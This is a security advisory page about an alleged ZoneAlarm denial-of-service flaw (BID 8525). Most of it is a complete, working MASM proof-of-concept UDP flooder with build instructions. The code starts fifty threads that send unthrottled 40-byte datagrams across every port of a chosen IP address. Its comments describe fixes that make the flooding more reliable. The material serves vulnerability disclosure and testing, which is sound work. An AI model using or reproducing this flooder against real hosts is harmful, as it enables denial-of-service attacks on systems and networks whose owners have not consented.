source: https://www.securityfocus.com/bid/8525/info
A denial of service vulnerability has been alleged in ZoneAlarm. It is reportedly possible to reproduce this condition by sending a flood of UDP packets of random sizes to random ports on a system hosting the vulnerable software. Note that the proof-of-concept below does not do exactly that: fifty threads share one UDP socket and send a fixed 40-byte datagram to the target, cycling sequentially through all 65536 destination ports, so neither the packet size nor the port order is random.
;// Threaded UDP flooder -- proof of concept for the ZoneAlarm denial of
;// service described above (BID 8525).  Fifty worker threads share one UDP
;// socket and send a fixed 40-byte datagram to every destination port of the
;// target in turn; packet sizes and ports are not randomised as the advisory
;// text suggests, so results against a given build may differ.
;//
;// Run this only against hosts you own or are explicitly authorised to test,
;// on an isolated network: it produces a sustained flood toward whatever
;// address is typed into the box, with no rate limit and no stop condition
;// other than the Cancel button.
;//
;// igor@email.ru Igor Franchuk
;//
;//---------------------------------------------------------------------------
; #########################################################################
; NOTE: this is MASM (ml.exe) syntax -- .model/invoke/.IF/.WHILE -- built with
; the MASM32 package, not NASM as the page header claims.  32-bit flat model,
; stdcall calling convention (callee cleans the stack; ebx/esi/edi preserved).
.386
.model flat, stdcall
option casemap :none            ; identifiers are case-sensitive
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib
include \masm32\include\comctl32.inc    ; InitCommonControls / SysIPAddress32
includelib \masm32\lib\comctl32.lib
include \masm32\include\ws2_32.inc      ; Winsock 2: WSAStartup, socket, htons, connect/send
includelib \masm32\lib\ws2_32.lib
; #########################################################################
; Forward declarations (stdcall).  Argument counts/sizes must match the proc
; definitions further down; invoke checks against these.
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
SetTransparency proto :DWORD,:BYTE              ; (HWND, alpha 0..255)
GetRegString proto :DWORD,:DWORD,:DWORD,:DWORD  ; declared only; neither defined nor called in this file
Spam proto :DWORD                               ; thread entry point: (thread index 0..49)
; #########################################################################
.DATA
; Window class name and title of the main window.
ClassName db "ZADOSWndClassObject",0
Caption db "ZoneAlarm DOS test",0
; Module and export resolved at run time by SetTransparency (GetProcAddress).
User32lib db "user32",0
SetLayeredWindowAttributesName db "SetLayeredWindowAttributes",0
; Twelve 0FFh bytes.  Not referenced anywhere in this file; the flood payload
; is taken from msgWinSockErrorAdr instead (see Spam).
SBuf db 255,255,255,255,255,255,255,255,255,255,255,255
; Control class names and captions.
IPEditBox db "SysIPAddress32",0
BtnName db "button",0
OKBtnCaption db "Spam",0
; User-facing error texts.  msgWinSockErrorAdr doubles as the UDP payload:
; Spam sends its first 40 bytes in every datagram.
msgEmptyAdr db "Invalid IP",0
msgWinSockErrorAdr db "WinSocket 2.0 is required. WSAStartup failed",0
msgWinSockErrorSock db "Invalid socket",0
CancelBtnCaption db "Cancel",0
ProtoName db "udp",0            ; argument to getprotobyname
; Thread control.  CThread is compared against the thread index in Spam but is
; never written anywhere in this file, so it stays 0.  GThreadExit is cleared
; when the threads are started and set to 1 by the Cancel handler; every Spam
; thread polls it to know when to stop.
CThread DWORD 0
GThreadExit DWORD 0
.DATA?
hInstance HANDLE ?              ; module handle, stored at 'start'
hIPEditWnd HANDLE ?             ; the SysIPAddress32 control (target address)
hwndOKBtn HANDLE ?              ; "Spam" button
hwndCancelBtn HANDLE ?          ; "Cancel" button
icex INITCOMMONCONTROLSEX <>    ; not used in this file; InitCommonControls is called without it
tIPAdr DWORD ?                  ; target address; converted to network byte order by WndProc before use
Socket DWORD ?                  ; the single UDP socket shared by all Spam threads; closed by Cancel
tIPAdrSN HANDLE ?               ; pointer to the inet_ntoa() text of the target (shown in a MessageBox)
WSAData WSADATA <>
SIN sockaddr_in <>              ; destination: sin_family/sin_addr set once by WndProc, sin_port rewritten by every Spam thread
TID HANDLE ?                    ; receives CreateThread's thread id; overwritten by each of the 50 creations
; Local mirror of Winsock's protoent as returned by getprotobyname().  Only
; p_proto is read (WndProc).  Winsock declares p_proto as a 16-bit short, so
; the reader masks the DWORD loaded from here down to 16 bits.
PROTOENTSTRUCT STRUCT
p_name DWORD ?                  ; char*  official protocol name
p_aliases DWORD ?               ; char** alias list
p_proto DWORD ?                 ; protocol number (low 16 bits valid)
PROTOENTSTRUCT ENDS
.CONST
; Extended window style and SetLayeredWindowAttributes flag used by
; SetTransparency (defined here for SDK headers that predate them).
WS_EX_LAYERED equ 80000h
LWA_ALPHA equ 2h
; Child-control ids, seen as LOWORD(wParam) in WM_COMMAND.
IPEditID equ 100h
OKBtnID equ 200h
CancelBtnID equ 201h
; SysIPAddress32 messages (same values as commctrl.h).  IPM_ISBLANK returns
; non-zero when all fields are empty; IPM_GETADDRESS stores the address through
; lParam in host byte order (first octet in the most significant byte), which
; is why WndProc byte-reverses it with REVERSE before putting it in sin_addr.
IPM_ISBLANK equ (WM_USER+105)
IPM_GETADDRESS equ (WM_USER+102)
; #########################################################################
; REVERSE ip  ->  eax = ip with its four bytes in the opposite order, i.e. what
; htonl() does to a DWORD.  The IP-address control hands the address back in
; host order; sin_addr needs network order.
; Clobbers: eax, flags.  No other register is touched (the original version
; borrowed ebx as scratch and saved/restored it around the swap).
; Rotates only, so it assembles under .386 without bswap.
REVERSE MACRO ip
    mov eax, ip
    ror ax, 8                   ; swap bytes 0 and 1
    ror eax, 16                 ; move them to the upper half
    ror ax, 8                   ; swap what were bytes 2 and 3
ENDM
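; MAKEWORD bLow, bHigh  ->  eax = (bHigh shl 8) xor bLow: the WORD WSAStartup
; expects, low byte = major version, high byte = minor.  Both arguments are
; expected to be 0..255; they are combined with XOR exactly as before, so bits
; above 7 in bLow would overlap the high byte.
; Clobbers: eax, flags.
; Fix: the original also used ebx as scratch and left it clobbered.  ebx is a
; preserved register under stdcall and is live in the WndProc that expands this
; macro; the high byte is now shifted in eax directly so ebx is untouched.
MAKEWORD MACRO bLow, bHigh
    mov eax, bHigh
    shl eax, 8
    xor eax, bLow
ENDM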
; #########################################################################
.CODE
; Program entry point (named in 'end start').  Stores the module handle for the
; window code, hands the command line to WinMain and exits with code 0
; regardless of what WinMain returns.
start:
; #Init
invoke GetModuleHandle, NULL; get the instance handle of our program.
mov hInstance,eax
invoke GetCommandLine; returns a pointer to the command line (passed on as lpCmdLine, unused there)
invoke WinMain, hInstance,NULL,eax, SW_SHOWDEFAULT ; call the main function
invoke ExitProcess,0
; #########################################################################
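; -----------------------------------------------------------------------------
; int WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmdLine, int mCmdShow)
; Registers the window class, creates the 256x118 tool-style main window, makes
; it semi-transparent (alpha 200/255) and pumps messages until WM_QUIT.
; Returns msg.wParam (the PostQuitMessage code), or 1 when the class could not
; be registered or the window could not be created.  'start' ignores the value.
; hPrevInst and lpCmdLine are not used.
; Changes vs. the original: the window style was the bare number 16CC0000h and
; is now written out as the WS_* flags it encodes; a failed RegisterClassEx or
; CreateWindowEx returns instead of entering GetMessage with no window.
; -----------------------------------------------------------------------------
WinMain proc hInst:HINSTANCE, hPrevInst:HINSTANCE, lpCmdLine:HANDLE, mCmdShow:DWORD
    LOCAL wc:WNDCLASSEX
    LOCAL msg:MSG
    LOCAL hWnd:HWND

    mov wc.cbSize, SIZEOF WNDCLASSEX
    mov wc.style, CS_DBLCLKS + CS_HREDRAW + CS_VREDRAW
    mov wc.lpfnWndProc, OFFSET WndProc
    mov wc.cbClsExtra, NULL
    mov wc.cbWndExtra, NULL
    push hInst
    pop wc.hInstance
    mov wc.hbrBackground, COLOR_WINDOW+1
    mov wc.lpszMenuName, NULL
    mov wc.lpszClassName, OFFSET ClassName
    invoke LoadIcon, NULL, IDI_APPLICATION
    mov wc.hIcon, eax
    mov wc.hIconSm, eax
    invoke LoadCursor, NULL, IDC_ARROW
    mov wc.hCursor, eax
    invoke RegisterClassEx, addr wc
    .IF eax == 0
        mov eax, 1                          ; class registration failed
        ret
    .ENDIF

    ; 16CC0000h == WS_VISIBLE or WS_CLIPSIBLINGS or WS_CLIPCHILDREN or
    ;              WS_CAPTION or WS_SYSMENU or WS_THICKFRAME
    invoke CreateWindowEx,\
           WS_EX_LEFT or WS_EX_LTRREADING or WS_EX_TOOLWINDOW or WS_EX_WINDOWEDGE,\
           ADDR ClassName,\
           ADDR Caption,\
           WS_VISIBLE or WS_CLIPSIBLINGS or WS_CLIPCHILDREN or WS_CAPTION or WS_SYSMENU or WS_THICKFRAME,\
           CW_USEDEFAULT,\
           CW_USEDEFAULT,\
           256,\
           118,\
           NULL,\
           NULL,\
           hInst,\
           NULL
    mov hWnd, eax
    .IF eax == NULL
        mov eax, 1                          ; window creation failed; nothing to pump
        ret
    .ENDIF

    invoke SetTransparency, hWnd, 200       ; alpha 200 of 255
    invoke ShowWindow, hWnd, mCmdShow
    invoke UpdateWindow, hWnd

    .WHILE TRUE                             ; message loop, ends on WM_QUIT (GetMessage -> 0)
        invoke GetMessage, ADDR msg, NULL, 0, 0
        .BREAK .IF (!eax)
        invoke TranslateMessage, ADDR msg
        invoke DispatchMessage, ADDR msg
    .ENDW
    mov eax, msg.wParam                     ; exit code from PostQuitMessage
    ret
WinMain endp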
; #########################################################################
; -----------------------------------------------------------------------------
; void SetTransparency(HWND hWnd, BYTE bAlpha)
; Adds WS_EX_LAYERED to hWnd and sets a constant alpha of bAlpha (0 = fully
; transparent, 255 = opaque).  SetLayeredWindowAttributes is looked up through
; GetProcAddress rather than imported, so the binary still loads on a user32
; that lacks the export; in that case -- or if LoadLibrary fails -- the window
; is left as it is.  The LoadLibrary reference is released before returning.
; The value left in eax is whatever the last API call returned; callers ignore it.
; -----------------------------------------------------------------------------
SetTransparency proc hWnd:HANDLE, bAlpha:BYTE
    LOCAL hLib:HANDLE
    LOCAL pfnSetLayered:DWORD

    invoke LoadLibrary, addr User32lib
    .IF eax == NULL
        ret                                 ; nothing mapped, nothing to release
    .ENDIF
    mov hLib, eax

    invoke GetProcAddress, hLib, addr SetLayeredWindowAttributesName
    mov pfnSetLayered, eax
    .IF eax != NULL
        ; Turn on WS_EX_LAYERED while keeping the other extended styles.
        invoke GetWindowLong, hWnd, GWL_EXSTYLE
        or eax, WS_EX_LAYERED
        invoke SetWindowLong, hWnd, GWL_EXSTYLE, eax
        ; SetLayeredWindowAttributes(hWnd, crKey = 0, bAlpha, LWA_ALPHA):
        ; stdcall through the resolved pointer, arguments pushed right to left.
        movzx eax, bAlpha
        push LWA_ALPHA
        push eax
        push NULL
        push hWnd
        call pfnSetLayered
    .ENDIF
    invoke FreeLibrary, hLib
    ret
SetTransparency endp
; #########################################################################
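; -----------------------------------------------------------------------------
; LRESULT WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
; Window procedure of the main window.
;   WM_CREATE   builds the IP-address control and the Spam / Cancel buttons.
;   WM_SIZE     re-centres those controls on the new client width.
;   WM_COMMAND  Spam: validates the address, initialises Winsock 2.0, opens one
;               UDP socket, fills SIN and starts 50 Spam threads.
;               Cancel: raises GThreadExit and closes the socket.
;   everything else goes to DefWindowProc.
; Returns 0 for handled messages.
; Fixes vs. the original:
;   * "uses ebx edi": a window procedure is called by user32 and must preserve
;     ebx/esi/edi (stdcall); the WM_SIZE and WM_COMMAND paths use both.
;   * getprotobyname() can return NULL; it was dereferenced unconditionally.
;     IPPROTO_UDP (17) is used as the fallback.
;   * CreateThread's dwCreationFlags was NORMAL_PRIORITY_CLASS, a process
;     priority-class value, not a creation flag; it is now 0.  The returned
;     thread handles were never closed (50 leaked handles per click) and are
;     closed immediately, which does not affect the running thread.
;   * WSACleanup() balances the successful WSAStartup() when socket() fails.
; Caveat (unchanged): Cancel closes the socket while the Spam threads may still
; be inside a Winsock call on it; they get an error from that call and stop on
; their next GThreadExit check.  WSACleanup is never called on that path.
; -----------------------------------------------------------------------------
WndProc proc uses ebx edi hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
    LOCAL protoent:DWORD
    LOCAL leftX:DWORD

    mov eax, uMsg
    .IF eax == WM_DESTROY
        invoke PostQuitMessage, NULL        ; ends the message loop in WinMain

    .ELSEIF eax == WM_CREATE
        invoke InitCommonControls
        ; Target address box (SysIPAddress32); WM_SIZE moves it to y = 10.
        invoke CreateWindowEx, NULL, ADDR IPEditBox, NULL,\
               WS_VISIBLE or WS_BORDER or WS_CHILD, 11,\
               90, 180, 25, hWnd, IPEditID,\
               hInstance, NULL
        mov hIPEditWnd, eax
        invoke CreateWindowEx, NULL, ADDR BtnName, ADDR OKBtnCaption,\
               WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\
               35, 50, 80, 25, hWnd, OKBtnID, hInstance, NULL
        mov hwndOKBtn, eax
        invoke CreateWindowEx, NULL, ADDR BtnName, ADDR CancelBtnCaption,\
               WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\
               134, 50, 80, 25, hWnd, CancelBtnID, hInstance, NULL
        mov hwndCancelBtn, eax
        invoke EnableWindow, hwndCancelBtn, FALSE   ; nothing to cancel yet
        ; bAlpha is a BYTE parameter: 500 is truncated to 244 (0F4h).  Kept as-is.
        invoke SetTransparency, hwndOKBtn, 500
        invoke SetFocus, hIPEditWnd

    .ELSEIF eax == WM_SIZE
        ; LOWORD(lParam) = new client width; the address box and the Spam
        ; button start at width/2 - 90, Cancel sits 99 px further right.
        mov eax, lParam
        and eax, 0FFFFh
        shr eax, 1
        sub eax, 90
        mov leftX, eax
        invoke MoveWindow, hIPEditWnd, leftX, 10, 180, 25, TRUE
        invoke MoveWindow, hwndOKBtn, leftX, 50, 80, 25, TRUE
        mov eax, leftX
        add eax, 99
        invoke MoveWindow, hwndCancelBtn, eax, 50, 80, 25, TRUE

    .ELSEIF eax == WM_COMMAND
        ; lParam == 0 would mean a menu/accelerator; only child controls matter here.
        .IF lParam != 0
            mov eax, wParam                 ; LOWORD = control id, HIWORD = notification code
            .IF ax == OKBtnID
                shr eax, 16
                .IF ax == BN_CLICKED
                    invoke SendMessage, hIPEditWnd, IPM_ISBLANK, 0, 0
                    .IF !eax
                        ; Address comes back in host order; sin_addr wants network order.
                        invoke SendMessage, hIPEditWnd, IPM_GETADDRESS, 0, ADDR tIPAdr
                        REVERSE tIPAdr
                        mov tIPAdr, eax
                        invoke inet_ntoa, tIPAdr
                        mov tIPAdrSN, eax
                        ; Shows the target about to be flooded; the flood starts when it is dismissed.
                        invoke MessageBox, NULL, tIPAdrSN, tIPAdrSN, MB_OK + MB_SYSTEMMODAL
                        MAKEWORD 2, 0                   ; request Winsock 2.0
                        invoke WSAStartup, eax, ADDR WSAData
                        .IF !eax
                            invoke getprotobyname, ADDR ProtoName
                            mov protoent, eax
                            .IF eax != NULL
                                mov edi, eax
                                assume edi:PTR PROTOENTSTRUCT
                                mov ebx, [edi].p_proto
                                assume edi:nothing
                                and ebx, 00FFFFh        ; p_proto is a 16-bit field in Winsock's protoent
                            .ELSE
                                mov ebx, IPPROTO_UDP    ; no protocol database entry; use the well-known number (17)
                            .ENDIF
                            invoke socket, AF_INET, SOCK_DGRAM, ebx
                            .IF eax != INVALID_SOCKET
                                mov Socket, eax
                                invoke EnableWindow, hwndOKBtn, FALSE
                                invoke EnableWindow, hwndCancelBtn, TRUE
                                mov SIN.sin_family, AF_INET
                                push tIPAdr
                                pop SIN.sin_addr            ; sin_port is filled in by each Spam thread
                                mov GThreadExit, 0
                                ; Start 50 worker threads; the parameter is the thread index.
                                xor ebx, ebx
                                .WHILE ebx < 50
                                    invoke CreateThread, NULL, NULL, OFFSET Spam, ebx, 0, ADDR TID
                                    .IF eax != NULL
                                        invoke CloseHandle, eax ; never waited on; drop the handle, the thread keeps running
                                    .ENDIF
                                    inc ebx
                                .ENDW
                            .ELSE
                                invoke WSAGetLastError      ; result discarded (handy under a debugger)
                                invoke WSACleanup           ; undo the WSAStartup above
                                invoke MessageBox, hWnd, ADDR msgWinSockErrorSock, ADDR Caption, MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
                            .ENDIF
                        .ELSE
                            invoke MessageBox, hWnd, ADDR msgWinSockErrorAdr, ADDR Caption, MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
                        .ENDIF
                    .ELSE
                        invoke MessageBox, hWnd, ADDR msgEmptyAdr, ADDR Caption, MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
                        invoke SetFocus, hIPEditWnd
                    .ENDIF
                .ENDIF
            .ELSEIF ax == CancelBtnID
                shr eax, 16
                .IF ax == BN_CLICKED
                    invoke EnableWindow, hwndOKBtn, TRUE
                    invoke EnableWindow, hwndCancelBtn, FALSE
                    mov GThreadExit, 1              ; ask every Spam thread to stop
                    invoke closesocket, Socket
                .ENDIF
            .ENDIF
        .ENDIF

    .ELSE
        invoke DefWindowProc, hWnd, uMsg, wParam, lParam   ; default message processing
        ret
    .ENDIF
    xor eax, eax
    ret
WndProc endp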
; #########################################################################
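; -----------------------------------------------------------------------------
; DWORD WINAPI Spam(LPVOID ThreadID)  -- thread entry; WndProc starts 50 of these.
; Until GThreadExit becomes non-zero, sends a 40-byte UDP datagram (the first
; 40 bytes of msgWinSockErrorAdr) to the address in SIN.sin_addr, cycling the
; destination port 1, 2, ..., 65535, 0, 1, ...  There is no pacing: each thread
; sends as fast as the socket lets it.
; Return value (eax) is not meaningful (the last Winsock result).
; Fixes vs. the original:
;   * Every thread did connect()+send() on the one shared socket after writing
;     its port into the global SIN, so thread A's peer address was routinely
;     replaced by thread B before A's send().  sendto() with a per-thread copy
;     of the address has no such race and needs no connect().
;   * GThreadExit is tested before the send, so a cancelled thread does not
;     issue one more datagram on the socket WndProc has just closed.
;   * The "CThread == ThreadID" test is gone: CThread is initialised to 0 and
;     never written in this file, so it only stopped thread #0 after one packet.
; -----------------------------------------------------------------------------
Spam proc ThreadID:DWORD
    LOCAL dest:sockaddr_in
    LOCAL port:DWORD

    ; Per-thread copy of the destination; family and address were set by WndProc.
    mov ax, SIN.sin_family
    mov dest.sin_family, ax
    push SIN.sin_addr
    pop dest.sin_addr
    mov port, 0

    .WHILE GThreadExit == 0
        ; Next destination port, wrapping 65535 -> 0.
        mov eax, port
        .IF eax < 65535
            inc eax
        .ELSE
            xor eax, eax
        .ENDIF
        mov port, eax
        invoke htons, eax
        mov dest.sin_port, ax
        ; Fixed 40-byte payload: the advisory mentions random sizes, this PoC does not vary them.
        invoke sendto, Socket, ADDR msgWinSockErrorAdr, 40, 0, ADDR dest, sizeof sockaddr_in
    .ENDW
    ret
Spam endp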
end start
--------------------------------------make file-------------------------------------------
# nmake makefile for the PoC; expects the MASM32 toolchain (ml.exe, link.exe)
# with its import libraries under c:\masm32\lib.
NAME=zados
# GUI subsystem (no console).  The import libraries are named by the
# 'includelib' directives in the source and found through /LIBPATH.
$(NAME).exe: $(NAME).obj
Link /SUBSYSTEM:WINDOWS /LIBPATH:c:\masm32\lib $(NAME).obj
# /c assemble only, /coff emit a COFF object, /Cp preserve identifier case.
$(NAME).obj: $(NAME).asm
ml /c /coff /Cp $(NAME).asm